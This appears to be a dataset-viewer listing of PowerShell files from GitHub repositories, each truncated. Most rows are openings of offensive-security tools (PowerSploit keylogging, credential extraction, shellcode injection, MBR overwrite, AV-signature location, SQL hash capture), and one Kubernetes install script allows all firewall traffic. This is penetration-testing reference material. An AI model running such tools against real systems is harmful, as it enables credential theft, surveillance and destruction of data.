source stringclasses 1
value | repo stringclasses 33
values | repo_url stringclasses 33
values | path stringlengths 7 179 | language stringclasses 1
value | license stringclasses 4
values | stars int64 2.27k 53.4k | ref stringclasses 4
values | size_bytes int64 48 259k | text stringlengths 48 259k |
|---|---|---|---|---|---|---|---|---|---|
github | dataplat/dbatools | https://github.com/dataplat/dbatools | .claude/hooks/validate-style.ps1 | PowerShell | mit | 2,763 | development | 5,792 | #!/usr/bin/env pwsh
# PreToolUse hook: Consolidated style validation for dbatools
# Runs all style checks in a single PowerShell process for performance
$ErrorActionPreference = "Stop"
try {
$inputJson = $input | Out-String | ConvertFrom-Json
} catch {
exit 0
}
$toolInput = $inputJson.tool_input
$filePath = ... |
github | omerbsezer/Fast-Kubernetes | https://github.com/omerbsezer/Fast-Kubernetes | create_real_cluster/win2019-kubeadm1.26.2-calico3.25.0-docker/install1.ps1 | PowerShell | mit | 2,734 | main | 2,037 | echo "#########################################################"
echo "Script will start in 10 Seconds..."
Start-Sleep -s 10
echo "Firewall rules : Allow All Traffic..."
New-NetFireWallRule -DisplayName "Allow All Traffic" -Direction OutBound -Action Allow
New-NetFireWallRule -DisplayName "Allow All Traffic" -Direct... |
github | omerbsezer/Fast-Kubernetes | https://github.com/omerbsezer/Fast-Kubernetes | create_real_cluster/win2019-kubeadm1.26.2-calico3.25.0-docker/install-docker-ce.ps1 | PowerShell | mit | 2,734 | main | 21,248 | # Microsoft: https://github.com/microsoft/Windows-Containers/blob/Main/helpful_tools/Install-DockerCE/install-docker-ce.ps1
############################################################
# Script to install the community edition of docker on Windows
############################################################
<#
.NO... |
github | omerbsezer/Fast-Kubernetes | https://github.com/omerbsezer/Fast-Kubernetes | create_real_cluster/win2019-kubeadm1.26.2-calico3.25.0-docker/install2.ps1 | PowerShell | mit | 2,734 | main | 1,496 | echo "#########################################################"
echo "Before to run this script, please be sure creating 'k' directory under C directory (c:\k) and includes K8s config file..."
echo "e.g. mkdir c:\k"
echo "e.g. run on the master node: scp -r /home/ubuntu/.kube/config windowsuser@IP:C:\k"
echo "#######... |
github | omerbsezer/Fast-Kubernetes | https://github.com/omerbsezer/Fast-Kubernetes | create_real_cluster/win2022-kubeadm1.32.0-calico3.29.1-containerd1.7.24/install2.ps1 | PowerShell | mit | 2,734 | main | 2,061 | echo "#########################################################"
echo "Before to run this script, please be sure creating 'k' directory under C directory (c:\k) and includes K8s config file..."
echo "e.g. mkdir c:\k"
echo "e.g. run on the master node: scp -r /home/ubuntu/.kube/config windowsuser@IP:C:\k"
echo "#######... |
github | omerbsezer/Fast-Kubernetes | https://github.com/omerbsezer/Fast-Kubernetes | create_real_cluster/win2022-kubeadm1.32.0-calico3.29.1-containerd1.7.24/install1.ps1 | PowerShell | mit | 2,734 | main | 1,951 | echo "#########################################################"
echo "Script will start in 10 Seconds..."
Start-Sleep -s 10
echo "Firewall rules : Allow All Traffic..."
New-NetFireWallRule -DisplayName "Allow All Traffic" -Direction OutBound -Action Allow
New-NetFireWallRule -DisplayName "Allow All Traffic" -Direct... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/PowerSploit.psd1 | PowerShell | mit | 2,733 | master | 5,275 | @{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'PowerSploit.psm1'
# Version number of this module.
ModuleVersion = '3.0.0.0'
# ID used to uniquely identify this module
GUID = '6753b496-d842-40a3-924a-0f09e248640c'
# Author of this module
Author = 'Matthew Graeber'
# Copyri... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Persistence/Persistence.psd1 | PowerShell | mit | 2,733 | master | 763 | @{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Persistence.psm1'
# Version number of this module.
ModuleVersion = '3.0.0.0'
# ID used to uniquely identify this module
GUID = '633d0f10-a056-41da-869d-6d2f75430195'
# Author of this module
Author = 'Matthew Graeber'
# Copyr... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Persistence/Persistence.psm1 | PowerShell | mit | 2,733 | master | 38,266 | function New-ElevatedPersistenceOption
{
<#
.SYNOPSIS
Configure elevated persistence options for the Add-Persistence function.
PowerSploit Function: New-ElevatedPersistenceOption
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Exfiltration/Get-GPPAutologon.ps1 | PowerShell | mit | 2,733 | master | 4,710 | function Get-GPPAutologon
{
<#
.SYNOPSIS
Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences.
PowerSploit Function: Get-GPPAutologon
Author: Oddvar Moe (@oddvarmoe)
Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Exfiltration/Get-TimedScreenshot.ps1 | PowerShell | mit | 2,733 | master | 3,696 | function Get-TimedScreenshot
{
<#
.SYNOPSIS
Takes screenshots at a regular interval and saves them to disk.
PowerSploit Function: Get-TimedScreenshot
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
A function that takes screenshots ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Exfiltration/Get-GPPPassword.ps1 | PowerShell | mit | 2,733 | master | 11,360 | function Get-GPPPassword {
<#
.SYNOPSIS
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
PowerSploit Function: Get-GPPPassword
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencie... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Exfiltration/Get-MicrophoneAudio.ps1 | PowerShell | mit | 2,733 | master | 7,366 | function Get-MicrophoneAudio {
<#
.SYNOPSIS
Records audio from the microphone and saves to a file on disk
Author: Justin Warner (@sixdub)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
All credit for PowerSploit functions belongs to the original author and project contributors. Thanks fo... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Exfiltration/Out-Minidump.ps1 | PowerShell | mit | 2,733 | master | 3,616 | function Out-Minidump
{
<#
.SYNOPSIS
Generates a full-memory minidump of a process.
PowerSploit Function: Out-Minidump
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Out-Minidump writes a process dump f... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Exfiltration/Exfiltration.psd1 | PowerShell | mit | 2,733 | master | 1,304 | @{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Exfiltration.psm1'
# Version number of this module.
ModuleVersion = '3.0.0.0'
# ID used to uniquely identify this module
GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
# Author of this module
Author = 'Matthew Graeber'
# Copy... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Exfiltration/Get-VaultCredential.ps1 | PowerShell | mit | 2,733 | master | 20,432 | function Get-VaultCredential
{
<#
.SYNOPSIS
Displays Windows vault credential objects including cleartext web credentials.
PowerSploit Function: Get-VaultCredential
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Get-VaultCredenti... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Exfiltration/Invoke-TokenManipulation.ps1 | PowerShell | mit | 2,733 | master | 94,704 | function Invoke-TokenManipulation
{
<#
.SYNOPSIS
This script requires Administrator privileges. It can enumerate the Logon Tokens available and use them to create new processes. This allows you to use
anothers users credentials over the network by creating a process with their logon token. This will work even with Win... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Exfiltration/VolumeShadowCopyTools.ps1 | PowerShell | mit | 2,733 | master | 9,559 | function Get-VolumeShadowCopy
{
<#
.SYNOPSIS
Lists the device paths of all local volume shadow copies.
PowerSploit Function: Get-VolumeShadowCopy
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
#>
$UserIdentity = ([Se... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Exfiltration/Get-Keystrokes.ps1 | PowerShell | mit | 2,733 | master | 16,512 | function Get-Keystrokes {
<#
.SYNOPSIS
Logs keys pressed, time and the active window.
PowerSploit Function: Get-Keystrokes
Original Authors: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
Revised By: Jesse Davis (@secabstraction)
License: BSD 3-Clause
Required Dependenc... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Mayhem/Mayhem.psm1 | PowerShell | mit | 2,733 | master | 12,935 | function Set-MasterBootRecord
{
<#
.SYNOPSIS
Proof of concept code that overwrites the master boot record with the
message of your choice.
PowerSploit Function: Set-MasterBootRecord
Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Depend... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Mayhem/Mayhem.psd1 | PowerShell | mit | 2,733 | master | 743 | @{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Mayhem.psm1'
# Version number of this module.
ModuleVersion = '3.0.0.0'
# ID used to uniquely identify this module
GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'
# Author of this module
Author = 'Matthew Graeber'
# Copyright ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Tests/CodeExecution.tests.ps1 | PowerShell | mit | 2,733 | master | 52,571 | Set-StrictMode -Version Latest
$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
$ModuleManifest = "$ModuleRoot\CodeExecution\CodeExecution.psd1"
Remove-Module [C]odeExecution
Import-Module $ModuleManifest -Force -ErrorAction Stop
Describe 'Invoke-Shell... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Tests/Recon.tests.ps1 | PowerShell | mit | 2,733 | master | 21,725 | $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
$ModuleManifest = "$ModuleRoot\Recon\Recon.psd1"
Remove-Module [R]econ
Import-Module $ModuleManifest -Force -ErrorAction Stop
# import PowerView.ps1 manually so we expose the helper functions for testing
... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Tests/Privesc.tests.ps1 | PowerShell | mit | 2,733 | master | 50,613 | Set-StrictMode -Version Latest
$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
$ModuleManifest = "$ModuleRoot\Privesc\Privesc.psd1"
Remove-Module [P]rivesc
Import-Module $ModuleManifest -Force -ErrorAction Stop
# import PowerUp.ps1 manually so we expo... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Tests/Exfiltration.tests.ps1 | PowerShell | mit | 2,733 | master | 2,450 | Set-StrictMode -Version Latest
$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
$ModuleManifest = "$ModuleRoot\Exfiltration\Exfiltration.psd1"
Remove-Module [E]xfiltration
Import-Module $ModuleManifest -Force -ErrorAction Stop
Describe 'Get-Keystrokes'... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Tests/PowerSploit.tests.ps1 | PowerShell | mit | 2,733 | master | 1,448 | Set-StrictMode -Version Latest
$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
filter Assert-NotLittleEndianUnicode {
[CmdletBinding()]
param (
[Parameter(Mandatory = $True,
ValueFromPipelineByPropertyName = $True,
... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Recon/Invoke-ReverseDnsLookup.ps1 | PowerShell | mit | 2,733 | master | 8,101 | function Invoke-ReverseDnsLookup
{
<#
.SYNOPSIS
Perform a reverse DNS lookup scan on a range of IP addresses.
PowerSploit Function: Invoke-ReverseDnsLookup
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Invoke-ReverseDnsLookup sc... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Recon/Recon.psd1 | PowerShell | mit | 2,733 | master | 2,888 | @{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Recon.psm1'
# Version number of this module.
ModuleVersion = '3.0.0.0'
# ID used to uniquely identify this module
GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'
# Author of this module
Author = 'Matthew Graeber', 'Will Schroed... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Recon/Invoke-Portscan.ps1 | PowerShell | mit | 2,733 | master | 41,534 | function Invoke-Portscan
{
<#
.SYNOPSIS
Simple portscan module
PowerSploit Function: Invoke-Portscan
Author: Rich Lundeen (http://webstersProdigy.net)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Does a simple port scan using regular sockets, based (pretty) loosely on n... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Recon/Get-ComputerDetails.ps1 | PowerShell | mit | 2,733 | master | 17,631 | function Get-ComputerDetails
{
<#
.SYNOPSIS
This script is used to get useful information from a computer.
Function: Get-ComputerDetails
Author: Joe Bialek, Twitter: @JosephBialek
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
This script is used to get useful information from a computer. Curr... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Recon/Get-HttpStatus.ps1 | PowerShell | mit | 2,733 | master | 3,679 | function Get-HttpStatus
{
<#
.SYNOPSIS
Returns the HTTP Status Codes and full URL for specified paths.
PowerSploit Function: Get-HttpStatus
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
A script to check for the existence of a path or... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/AntivirusBypass/Find-AVSignature.ps1 | PowerShell | mit | 2,733 | master | 6,583 | function Find-AVSignature
{
<#
.SYNOPSIS
Locate tiny AV signatures.
PowerSploit Function: Find-AVSignature
Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Locates single Byte AV signatures utilizing the... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/AntivirusBypass/AntivirusBypass.psd1 | PowerShell | mit | 2,733 | master | 844 | @{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'AntivirusBypass.psm1'
# Version number of this module.
ModuleVersion = '3.0.0.0'
# ID used to uniquely identify this module
GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'
# Author of this module
Author = 'Matthew Graeber'
# C... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/ScriptModification/Remove-Comments.ps1 | PowerShell | mit | 2,733 | master | 5,061 | function Remove-Comments
{
<#
.SYNOPSIS
Strips comments and extra whitespace from a script.
PowerSploit Function: Remove-Comments
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Remove-Comments strips out comments and unnecessary ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/ScriptModification/Out-EncryptedScript.ps1 | PowerShell | mit | 2,733 | master | 4,850 | function Out-EncryptedScript
{
<#
.SYNOPSIS
Encrypts text files/scripts.
PowerSploit Function: Out-EncryptedScript
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Out-EncryptedScript will encrypt a script (or any text file for that... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/ScriptModification/Out-CompressedDll.ps1 | PowerShell | mit | 2,733 | master | 2,386 | function Out-CompressedDll
{
<#
.SYNOPSIS
Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
PowerSploit Function: Out-CompressedDll
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Out-Compres... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/ScriptModification/Out-EncodedCommand.ps1 | PowerShell | mit | 2,733 | master | 7,792 | function Out-EncodedCommand
{
<#
.SYNOPSIS
Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
PowerSploit Function: Out-EncodedCommand
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Ou... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/ScriptModification/ScriptModification.psd1 | PowerShell | mit | 2,733 | master | 952 | @{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'ScriptModification.psm1'
# Version number of this module.
ModuleVersion = '3.0.0.0'
# ID used to uniquely identify this module
GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'
# Author of this module
Author = 'Matthew Graeber'
... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Privesc/Get-System.ps1 | PowerShell | mit | 2,733 | master | 26,485 | function Get-System {
<#
.SYNOPSIS
GetSystem functionality inspired by Meterpreter's getsystem.
'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create
a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege.
NOTE: if running PowerShell 2.0, start p... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/Privesc/Privesc.psd1 | PowerShell | mit | 2,733 | master | 1,564 | @{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Privesc.psm1'
# Version number of this module.
ModuleVersion = '3.0.0.0'
# ID used to uniquely identify this module
GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'
# Author of this module
Author = 'Will Schroeder'
# Copyright ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/CodeExecution/Invoke-DllInjection.ps1 | PowerShell | mit | 2,733 | master | 12,721 | function Invoke-DllInjection
{
<#
.SYNOPSIS
Injects a Dll into the process ID of your choosing.
PowerSploit Function: Invoke-DllInjection
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Invoke-DllInjection injects a Dll into an arb... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/CodeExecution/Invoke-Shellcode.ps1 | PowerShell | mit | 2,733 | master | 23,817 | function Invoke-Shellcode
{
<#
.SYNOPSIS
Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
PowerSploit Function: Invoke-Shellcode
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESC... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/CodeExecution/Invoke-ReflectivePEInjection.ps1 | PowerShell | mit | 2,733 | master | 135,782 | function Invoke-ReflectivePEInjection
{
<#
.SYNOPSIS
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for informati... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/CodeExecution/CodeExecution.psd1 | PowerShell | mit | 2,733 | master | 952 | @{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'CodeExecution.psm1'
# Version number of this module.
ModuleVersion = '3.0.0.0'
# ID used to uniquely identify this module
GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'
# Author of this module
Author = 'Matthew Graeber'
# Com... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Master/CodeExecution/Invoke-WmiCommand.ps1 | PowerShell | mit | 2,733 | master | 14,479 | function Invoke-WmiCommand {
<#
.SYNOPSIS
Executes a PowerShell ScriptBlock on a target computer using WMI as a
pure C2 channel.
Author: Matthew Graeber
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Invoke-WmiCommand executes a PowerShell ScriptBlock on a target
computer... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/JAWS/jaws-enum.ps1 | PowerShell | mit | 2,733 | master | 16,974 | <#
.SYNOPSIS
Windows enumeration script
.DESCRIPTION
This script is designed to be used in a penetration test or CTF
enviroment. It will enumerate useful information from the host
for privilege escalation.
.EXAMPLE
PS > .\jaws-enum.ps1
will write results out to screen.
.EXAMPLE
PS > .\jaws-enum.ps1 -OutputFileName Jaw... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Invoke-CradleCrafter/Invoke-CradleCrafter.psd1 | PowerShell | mit | 2,733 | master | 1,884 | # This file is part of Invoke-CradleCrafter.
#
# Copyright 2017 Daniel Bohannon <@danielhbohannon>
# while at Mandiant <http://www.mandiant.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a cop... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Set-PS-WMI/Set-RemotePSRemoting.ps1 | PowerShell | mit | 2,733 | master | 5,719 | function Set-RemotePSRemoting
{
<#
.SYNOPSIS
Nishang script which can be used to modify Security Descriptors of PowerShell Remoting to provide access for non-admin domain users.
.DESCRIPTION
The script takes a username and adds FUll Control (Generic All) to the ACL of PowerShell Remoting
The script needs elevat... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Set-PS-WMI/Set-RemoteWMI.ps1 | PowerShell | mit | 2,733 | master | 8,203 | function Set-RemoteWMI
{
<#
.SYNOPSIS
Nishang script which can be used to modify Security Descriptors of DCOM and WMI namespaces to provide non-admin domain users access to WMI.
.DESCRIPTION
The script takes a username and adds permissions equivalent to Built-in Administratorsto the ACL of
DCOM and WMI namespac... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerUpSQL/PowerUpSQL.psm1 | PowerShell | mit | 2,733 | master | 111 | Get-ChildItem (Join-Path -Path $PSScriptRoot -ChildPath *.ps1) | ForEach-Object -Process {
. $_.FullName
} |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerUpSQL/PowerUpSQL.psd1 | PowerShell | mit | 2,733 | master | 4,773 | #requires -Version 1
@{
ModuleToProcess = 'PowerUpSQL.psm1'
ModuleVersion = '1.104.13'
GUID = 'dd1fe106-2226-4869-9363-44469e930a4a'
Author = 'Scott Sutherland'
Copyright = 'BSD 3-Clause'
Description = 'PowerUpSQL is an offensive toolkit designed for a... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerUpSQL/tests/PowerUpSQLTests.ps1 | PowerShell | mit | 2,733 | master | 60,191 | # PowerUpSQL Pester Tests
# Tested on SQL Server 2014
# This should used against a local SQL Server instance that meets the following criteria:
# - SQL Server 2014
# - Mixed mode
# - The windows user running the script has sysadmin
# - The pesterdb.sql configuration script was run on the SQL Server by a sysadmin
#####... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerUpSQL/templates/CheatSheet_SMO_Commands.ps1 | PowerShell | mit | 2,733 | master | 3,191 | # Script Name:
# SQL Server SMO Cheatsheet (0.CheatSheet-SqlServerSmo.ps1)
# Author:
# Scott Sutherland (@_nullbind), 2015 NetSPI
# Description:
# This file contains basic examples that show how to query SQL Server
# for configuration information using the SQL Server SDK SMO APIs.
# Requirements:
# The ex... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerUpSQL/scripts/pending/Get-SQLServiceAccountPwHashes.ps1 | PowerShell | mit | 2,733 | master | 3,964 | # author: scott sutherland (@_nullbind), NetSPI 2016
# script name: Get-SQLServiceAccountPwHash.ps1
# requirements: PowerUpSQL and Inveigh
# description: locate domain sql servers, attempt login, unc path inject to capture password hash of associated service account.
# example: Get-SQLServiceAccountPwHashes -Verbose -C... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerUpSQL/scripts/pending/Get-SQLCompactQuery.ps1 | PowerShell | mit | 2,733 | master | 1,957 | # Script: Get-SQLCompactQuery
# Pseudo Author: Scott Sutherland (@_nullbind), NetSPI 2016
# This script is a slightly modified version of Jeremiah Clark's example code from the reference below.
# Reference: https://blogs.msdn.microsoft.com/miah/2011/08/08/powershell-and-sql-server-compact-4-0-a-happy-mix/
# Reference: ... |
